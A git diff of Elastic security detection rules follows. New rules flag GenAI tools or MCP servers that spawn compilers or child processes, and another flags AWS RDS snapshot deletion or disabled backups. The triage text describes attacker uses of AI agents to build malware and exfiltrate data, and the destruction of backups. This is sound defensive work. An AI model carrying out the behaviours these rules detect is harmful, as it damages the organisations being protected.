Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration to your system:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Network Packet Capture Integration Setup\nThe Network Packet Capture integration sniffs network packets on a host and dissects known protocols. Monitoring the network traffic is critical to gaining observability and securing your environment \u2014 ensuring high levels of performance and security. The Network Packet Capture integration captures the network traffic between your application servers, decodes common application layer protocols and records the interesting fields for each transaction.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"network_traffic\" to your system:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cNetwork Packet Capture\u201d and select the integration to see more details about it.\n- Click \u201cAdd Network Packet Capture\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cnetwork_traffic\u201d to an existing or a new agent policy, and deploy the agent on your system from which network log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/network_traffic).\n", + "severity": "low", + "tags": [ + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1046", + "name": "Network Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1046/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1498", + "name": "Network Denial of Service", + "reference": "https://attack.mitre.org/techniques/T1498/" + } + ] + } + ], + "type": "machine_learning", + "version": 108 + }, + "id": "b240bfb8-26b7-4e5e-924e-218144a3fa71_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_210.json b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_210.json index c3277611719..a3dfc36c2f7 100644 --- a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_210.json +++ b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_210.json @@ -24,7 +24,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-f6a7-8901-bcde-f123456789ab_1.json b/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-f6a7-8901-bcde-f123456789ab_1.json new file mode 100644 index 00000000000..b6ebc1ca9eb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-f6a7-8901-bcde-f123456789ab_1.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when GenAI tools spawn compilers or packaging tools to generate executables. Attackers leverage local LLMs to autonomously generate and compile malware, droppers, or implants. Python packaging tools (pyinstaller, nuitka, pyarmor) are particularly high-risk as they create standalone executables that can be deployed without dependencies. This rule focuses on compilation activity that produces output binaries, filtering out inspection-only operations.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "GenAI Process Compiling or Generating Executables", + "note": "## Triage and analysis\n\n### Investigating GenAI Process Compiling or Generating Executables\n\nThis rule detects GenAI tools spawning compilers or packaging tools. While developers may use GenAI to write code that they then compile, autonomous compilation by GenAI processes is unusual.\n\n### Possible investigation steps\n\n- Review the GenAI process that spawned the compiler to identify which tool is running and verify if it's an expected/authorized tool.\n- Investigate the user account associated with the GenAI process to determine if this activity is expected for that user.\n- Review the output files created by the compilation process to identify any malicious executables.\n- Check for other alerts or suspicious activity on the same host around the same time.\n- Verify if the GenAI tool is from a trusted source and if it's authorized for use in your environment.\n- Identify whether the generated executables appear in temporary directories often used for malware staging (`%TEMP%`, `/tmp`, `.cache`).\n- Inspect the compiled artifacts for networking imports, credential harvesting functionality, or persistence mechanisms.\n\n### False positive analysis\n\n- Legitimate development workflows that use GenAI tools for code generation may trigger this rule if they compile the generated code.\n- Some GenAI-assisted coding IDEs (Cursor, Copilot Workspace) may run compilation tasks when testing code; confirm whether the behavior is tied to developer workflow.\n\n### Response and remediation\n\n- Terminate the GenAI process and any spawned compiler processes to stop the malicious activity.\n- Investigate the compiled executables to determine if they are malicious.\n- Review audit logs to determine the scope of compilation activity and identify any executables that may have been created.\n- Quarantine any compiled binaries; submit suspicious artifacts to sandbox or malware analysis.\n", + "query": "process where event.type == \"start\" and\n\n // GenAI parent process\n (\n process.parent.name in (\n \"ollama.exe\", \"ollama\", \"Ollama\",\n \"textgen.exe\", \"textgen\", \"text-generation-webui.exe\", \"oobabooga.exe\",\n \"lmstudio.exe\", \"lmstudio\", \"LM Studio\",\n \"claude.exe\", \"claude\", \"Claude\",\n \"cursor.exe\", \"cursor\", \"Cursor\", \"Cursor Helper\", \"Cursor Helper (Plugin)\",\n \"copilot.exe\", \"copilot\", \"Copilot\",\n \"codex.exe\", \"codex\",\n \"Jan\", \"jan.exe\", \"jan\", \"Jan Helper\",\n \"gpt4all.exe\", \"gpt4all\", \"GPT4All\",\n \"gemini-cli.exe\", \"gemini-cli\",\n \"genaiscript.exe\", \"genaiscript\",\n \"grok.exe\", \"grok\",\n \"qwen.exe\", \"qwen\",\n \"koboldcpp.exe\", \"koboldcpp\", \"KoboldCpp\",\n \"llama-server\", \"llama-cli\"\n ) or\n \n // Node/Deno with GenAI frameworks\n (process.parent.name in (\"node.exe\", \"node\", \"deno.exe\", \"deno\") and\n process.parent.command_line like~ (\"*mcp-server*\", \"*@modelcontextprotocol*\", \"*langchain*\", \"*autogpt*\", \"*babyagi*\", \"*agentgpt*\", \"*crewai*\", \"*semantic-kernel*\", \"*llama-index*\", \"*haystack*\")) or\n \n // Python with GenAI frameworks\n (process.parent.name like~ \"python*\" and\n process.parent.command_line like~ (\"*langchain*\", \"*autogpt*\", \"*babyagi*\", \"*agentgpt*\", \"*crewai*\", \"*semantic-kernel*\", \"*llama-index*\", \"*haystack*\"))\n ) and\n\n // Compilation tools\n (\n // Python packaging\n process.name in (\"pyinstaller\", \"py2exe\", \"cx_Freeze\", \"nuitka\", \"pyarmor\", \"pkg\") or\n \n // C/C++ compilation with output\n (process.name in (\"gcc\", \"g++\", \"clang\", \"clang++\", \"cl.exe\") and\n process.command_line like~ \"*-o *\" and\n process.command_line like~ (\"*.c *\", \"*.c\", \"*.cpp *\", \"*.cpp\", \"*.cc *\", \"*.cc\", \"*.m *\", \"*.m\") and\n not process.command_line like~ \"*git*\") or\n \n // Go compilation\n (process.name == \"go\" and process.args == \"build\") or\n \n // Rust compilation\n (process.name == \"cargo\" and process.args == \"build\") or\n (process.name == \"rustc\" and process.command_line like~ \"*-o *\") or\n \n // .NET compilation\n process.name in (\"csc.exe\", \"vbc.exe\", \"msbuild.exe\") or\n (process.name == \"dotnet\" and process.args == \"build\") or\n \n // Java compilation\n process.name == \"javac\"\n )\n", + "references": [ + "https://atlas.mitre.org/techniques/AML.T0053", + "https://www.elastic.co/security-labs/elastic-advances-llm-security" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "auditd_manager", + "version": "^1.18.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b2c3d4e5-f6a7-8901-bcde-f123456789ab", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Auditd Manager", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", + "Domain: LLM", + "Mitre Atlas: T0053" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/", + "subtechnique": [ + { + "id": "T1027.004", + "name": "Compile After Delivery", + "reference": "https://attack.mitre.org/techniques/T1027/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "b2c3d4e5-f6a7-8901-bcde-f123456789ab_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-f6a7-8901-bcde-f23456789012_1.json b/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-f6a7-8901-bcde-f23456789012_1.json new file mode 100644 index 00000000000..47432946f58 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-f6a7-8901-bcde-f23456789012_1.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Detects child process execution from GenAI tools or MCP (Model Context Protocol) servers. Adversaries exploit AI agents to execute system commands, exfiltrate data, or establish persistence. MCP servers provide LLMs direct access to execute shell commands, read files, and interact with external services. This building block provides visibility into AI-initiated process execution for correlation with other suspicious activity.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "GenAI or MCP Server Child Process Execution", + "query": "process where event.type == \"start\" \n and (\n // GenAI clients\n process.parent.name in (\n \"Cursor\", \"Cursor.exe\", \"cursor\",\n \"Cursor Helper\", \"Cursor Helper (Plugin)\", \"Cursor Helper (GPU)\", \"Cursor Helper (Renderer)\",\n \"Claude\", \"Claude.exe\", \"claude\",\n \"Claude Helper\", \"Claude Helper (Plugin)\", \"Claude Helper (GPU)\", \"Claude Helper (Renderer)\",\n \"Windsurf\", \"Windsurf.exe\", \"windsurf\",\n \"Windsurf Helper\", \"Windsurf Helper (Plugin)\", \"Windsurf Helper (GPU)\", \"Windsurf Helper (Renderer)\",\n \"Code\", \"Code.exe\", \"code\",\n \"Code Helper\", \"Code Helper (Plugin)\", \"Code Helper (GPU)\", \"Code Helper (Renderer)\",\n \"codex\", \"codex.exe\",\n \"Copilot\", \"Copilot.exe\", \"copilot\",\n \"Jan\", \"Jan.exe\", \"jan\",\n \"Jan Helper\", \"Jan Helper (Plugin)\", \"Jan Helper (GPU)\", \"Jan Helper (Renderer)\",\n \"LM Studio\", \"LM Studio.exe\", \"lmstudio\",\n \"Ollama\", \"Ollama.exe\", \"ollama\",\n \"GPT4All\", \"gpt4all\", \"gpt4all.exe\",\n \"textgen.exe\", \"textgen\", \"text-generation-webui.exe\", \"oobabooga.exe\",\n \"gemini-cli.exe\", \"gemini-cli\",\n \"genaiscript.exe\", \"genaiscript\",\n \"grok.exe\", \"grok\",\n \"qwen.exe\", \"qwen\",\n \"koboldcpp.exe\", \"koboldcpp\", \"KoboldCpp\",\n \"llama-server\", \"llama-cli\"\n ) or\n // Package managers running MCP servers\n (process.parent.name in (\"npx\", \"npx.exe\", \"pnpm\", \"pnpm.exe\", \"yarn\", \"yarn.exe\", \"bunx\", \"bunx.exe\") and\n process.parent.command_line like~ (\"*@modelcontextprotocol/*\", \"*mcp-server-*\", \"*mcp_server*\")) or\n \n // Node/Deno/Bun running MCP servers\n (process.parent.name in (\"node\", \"node.exe\", \"deno\", \"deno.exe\", \"bun\", \"bun.exe\") and\n process.parent.command_line like~ (\"*@modelcontextprotocol/*\", \"*mcp-server-*\", \"*mcp_server*\")) or\n \n // Python MCP servers\n (process.parent.name like~ \"python*\" and\n process.parent.command_line like~ (\"*-m mcp_server*\", \"*mcp-server-*\", \"*mcp_server*\")) or\n \n // MCP server binaries\n process.parent.name like~ (\"mcp-server*\", \"*-mcp-server\", \"*_mcp_server*\") or\n process.parent.name in (\"mcp-server\", \"mcp-server-elastic-cloud\", \"github-mcp-server\")\n )\n and process.name != null\n // Exclusions\n and not (\n // Runtime self-spawns\n (process.parent.name in (\"node\", \"node.exe\") and process.name in (\"node\", \"node.exe\")) or\n (process.parent.name like~ \"python*\" and process.name like~ \"python*\") or\n (process.parent.name in (\"deno\", \"deno.exe\") and process.name in (\"deno\", \"deno.exe\")) or\n (process.parent.name in (\"bun\", \"bun.exe\") and process.name in (\"bun\", \"bun.exe\")) or\n \n // Helper process self-spawns\n (process.parent.name == \"Cursor\" and process.name like~ \"Cursor Helper*\") or\n (process.parent.name == \"Claude\" and process.name like~ \"Claude Helper*\") or\n (process.parent.name == \"Windsurf\" and process.name like~ \"Windsurf Helper*\") or\n (process.parent.name == \"Code\" and process.name like~ \"Code Helper*\") or\n (process.parent.name == \"Jan\" and process.name like~ \"Jan Helper*\") or\n (process.parent.name == \"LM Studio\" and process.name like~ \"LM Studio Helper*\") or\n (process.parent.name == \"Ollama\" and process.name like~ \"Ollama Helper*\") or\n \n // Version and help checks\n process.args in (\"--version\", \"--help\", \"-v\", \"-h\", \"-V\", \"version\", \"help\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "b2c3d4e5-f6a7-8901-bcde-f23456789012", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Rule Type: BBR", + "Domain: LLM", + "Mitre Atlas: T0053" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "b2c3d4e5-f6a7-8901-bcde-f23456789012_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b36c99af-b944-4509-a523-7e0fad275be1_6.json b/packages/security_detection_engine/kibana/security_rule/b36c99af-b944-4509-a523-7e0fad275be1_6.json new file mode 100644 index 00000000000..dfd0f36b4ea --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b36c99af-b944-4509-a523-7e0fad275be1_6.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of an AWS RDS DB snapshot or configuration changes that effectively remove backup coverage for a DB instance. RDS snapshots contain full backups of database instances, and disabling automated backups by setting \"backupRetentionPeriod=0\" has a similar impact by preventing future restore points. Adversaries with the appropriate permissions may delete snapshots or disable backups to inhibit recovery, destroy forensic evidence, or prepare for follow-on destructive actions such as instance or cluster deletion.", + "false_positives": [ + "Snapshots may be deleted by a system administrator. Verify whether the user identity should be making changes in your environment. Snapshot deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "AWS RDS Snapshot Deleted", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. \n> While every effort has been made to ensure its quality, validate and adapt it to suit your operational needs.\n\n### Investigating AWS RDS Snapshot Deleted\n\nAWS RDS snapshots (manual or automated) and backup retention settings are core to database recovery and incident response. Deleting snapshots or disabling automated backups (`backupRetentionPeriod=0`) can prevent restoration to a known-good state and destroy forensic evidence of attacker actions.\n\nThis rule detects successful snapshot deletions and configuration changes that disable automated backups. Activity that matches this pattern may indicate destructive actions, ransomware preparation, cleanup after data theft, or an operator misconfiguration that materially weakens recovery options.\n\n#### Possible investigation steps\n\n- **Identify the actor and context**\n - Review `aws.cloudtrail.user_identity.arn`, `aws.cloudtrail.user_identity.type`, and `aws.cloudtrail.user_identity.access_key_id` to determine who performed the action.\n - Check `user.name`, `source.ip`, and `user_agent.original` to understand where and how the change was made (console, CLI, SDK, automation).\n\n- **Determine what was affected**\n - Inspect `aws.cloudtrail.request_parameters` to identify:\n - The snapshot or cluster snapshot identifier (`DeleteDBSnapshot` / `DeleteDBClusterSnapshot`).\n - The DB instance identifier and the new `backupRetentionPeriod` value for `ModifyDBInstance`.\n - Map the snapshot/instance to:\n - Application/owner team.\n - Environment (prod, staging, dev).\n - Data sensitivity or criticality.\n\n- **Reconstruct intent and timing**\n - Use `@timestamp` to correlate the event with:\n - Recent `ModifyDBInstance`, `ModifyDBCluster`, `DeleteDBInstance`, or `DeleteDBCluster` events.\n - Other data-impacting changes (e.g., `deletionProtection=false`, security group changes, public accessibility, or RDS parameter modifications).\n - Compare the timing against approved maintenance/change windows and deployment pipelines.\n\n- **Correlate with broader activity**\n - In CloudTrail, pivot on:\n - The same `aws.cloudtrail.user_identity.arn` or access key ID.\n - The same DB instance/cluster identifiers.\n - Look for:\n - Suspicious reads or exports before deletion (`DescribeDBSnapshots`, `CopyDBSnapshot`, data export, or large `SELECT` / dump activity visible via other telemetry).\n - Follow-on destructive actions (DB instance deletion, subnet/security group changes that isolate monitoring tools, or IAM policy changes).\n - Verify whether other snapshots for the same instance or account were deleted in the same time window.\n\n- **Validate intent with owners**\n - Confirm with the DB/application owner and platform/DBA teams whether:\n - The snapshot deletion or backup change was requested and approved.\n - There are parallel infrastructure changes (migrations, environment teardown, or cost-optimization tasks) that explain the activity.\n\n### False positive analysis\n\n- **Planned lifecycle and cost optimization**\n - Many environments routinely prune old snapshots or adjust backup retention for non-production workloads.\n\n- **Automated backup and housekeeping tools**\n - Backup or housekeeping services may manage snapshots and retention. This rule already excludes typical `backup.amazonaws.com` events, but you should:\n - Identify any additional in-house or third-party automation roles.\n - Tune the rule with exceptions based on `user_agent.original`, `aws.cloudtrail.user_identity.arn`, or known service roles.\n\n### Response and remediation\n\n- **Contain and restore protection**\n - If activity appears unauthorized:\n - Immediately review the affected DB instances and clusters and restore `backupRetentionPeriod` to an appropriate value.\n - Verify that deletion protection and other guardrails are enabled where applicable.\n - For snapshot deletions, assess:\n - Whether alternate snapshots (manual or automated) are still available.\n - Whether point-in-time recovery is still possible based on transaction logs and remaining backups.\n\n- **Investigate scope and impact**\n - Use CloudTrail to:\n - Enumerate all recent snapshot deletions and backup configuration changes by the same actor or from the same `source.ip`.\n - Identify any subsequent `DeleteDBInstance`, `DeleteDBCluster`, or public exposure (`publiclyAccessible=true`) events.\n - Engage the application and data owners to:\n - Evaluate potential data loss, downtime impact, and regulatory implications.\n - Determine if any sensitive or compliance-bound data may be unrecoverable.\n\n- **Hardening and preventive controls**\n - Restrict RDS administration:\n - Limit `rds:DeleteDBSnapshot`, `rds:DeleteDBClusterSnapshot`, and `rds:ModifyDBInstance` (especially backup and deletion-related parameters) to a small set of privileged roles.\n - Use IAM conditions (e.g., `aws:PrincipalArn`, `aws:RequestedRegion`) to constrain where and by whom destructive actions can be performed.\n - Add guardrails:\n - Use AWS Config rules and/or Security Hub controls to detect:\n - Instances with `backupRetentionPeriod=0`.\n - Instances lacking deletion protection or cross-region/cross-AZ backup strategy.\n - Consider SCPs in AWS Organizations to block or tightly control destructive RDS APIs in production accounts.\n\n- **Post-incident improvements**\n - If malicious or unsafe behavior is confirmed:\n - Rotate credentials for the involved principals and review STS session usage.\n - Update runbooks and change management to explicitly track snapshot and backup policy changes.\n - Refine this rule\u2019s exceptions, tags, or severity to better align with your environment while preserving coverage for truly risky events.\n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)** \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/).\n", + "query": "any where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"rds.amazonaws.com\"\n and event.outcome == \"success\"\n and (\n event.action in (\"DeleteDBSnapshot\", \"DeleteDBClusterSnapshot\") or\n (event.action == \"ModifyDBInstance\" and stringContains(aws.cloudtrail.request_parameters, \"backupRetentionPeriod=0\"))\n )\n and not (\n user_agent.original == \"backup.amazonaws.com\" \n and source.address == \"backup.amazonaws.com\"\n )\n", + "references": [ + "https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_DeleteSnapshot.html", + "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBSnapshot.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.address", + "type": "keyword" + }, + { + "ecs": true, + "name": "user_agent.original", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b36c99af-b944-4509-a523-7e0fad275be1", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS RDS", + "Use Case: Asset Visibility", + "Tactic: Impact", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "b36c99af-b944-4509-a523-7e0fad275be1_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_207.json b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_207.json deleted file mode 100644 index d30db4b95a9..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_207.json +++ /dev/null @@ -1,114 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.", - "false_positives": [ - "GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS STS GetSessionToken Abuse", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS STS GetSessionToken Abuse\n\nAWS Security Token Service (STS) provides temporary credentials for AWS resources, crucial for managing access without long-term credentials. Adversaries may exploit GetSessionToken to create temporary credentials, enabling lateral movement and privilege escalation. The detection rule identifies successful GetSessionToken requests by IAM users, flagging potential misuse for further investigation.\n\n### Possible investigation steps\n\n- Review the CloudTrail logs for the specific GetSessionToken event to gather details about the IAM user involved, including the time of the request and the source IP address.\n- Check the IAM user's activity history to identify any unusual patterns or deviations from their normal behavior, such as accessing resources they typically do not use.\n- Investigate the source IP address from which the GetSessionToken request originated to determine if it is associated with known malicious activity or if it is an unexpected location for the user.\n- Examine the permissions and roles associated with the temporary credentials issued by the GetSessionToken request to assess the potential impact of their misuse.\n- Correlate the GetSessionToken event with other security events or alerts in the same timeframe to identify any related suspicious activities or potential indicators of compromise.\n\n### False positive analysis\n\n- Routine administrative tasks by IAM users can trigger GetSessionToken requests. To manage this, identify and whitelist IAM users or roles that regularly perform these tasks as part of their job functions.\n- Automated scripts or applications that use GetSessionToken for legitimate purposes may cause false positives. Review and document these scripts, then create exceptions for their activity in the detection rule.\n- Scheduled jobs or services that require temporary credentials for periodic tasks might be flagged. Ensure these are documented and excluded from alerts by adjusting the rule to recognize their specific patterns.\n- Development and testing environments often generate GetSessionToken requests during normal operations. Consider excluding these environments from the rule or adjusting the risk score to reflect their lower threat level.\n- Cross-account access scenarios where users from one account access resources in another using temporary credentials can appear suspicious. Verify these access patterns and exclude them if they are part of regular operations.\n\n### Response and remediation\n\n- Immediately revoke the temporary credentials associated with the suspicious GetSessionToken request to prevent further unauthorized access.\n- Conduct a thorough review of the IAM user's activity logs to identify any unauthorized actions or access patterns that may indicate lateral movement or privilege escalation.\n- Isolate any affected resources or accounts to contain potential threats and prevent further exploitation.\n- Reset the credentials of the IAM user involved and enforce multi-factor authentication (MFA) to enhance security.\n- Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation.\n- Implement additional monitoring and alerting for unusual GetSessionToken requests to detect similar activities in the future.\n- Review and tighten IAM policies and permissions to ensure the principle of least privilege is enforced, reducing the risk of privilege escalation.", - "query": "event.dataset:aws.cloudtrail and event.provider:sts.amazonaws.com and event.action:GetSessionToken and\naws.cloudtrail.user_identity.type:IAMUser and event.outcome:success\n", - "references": [ - "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "aws.cloudtrail.user_identity.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", 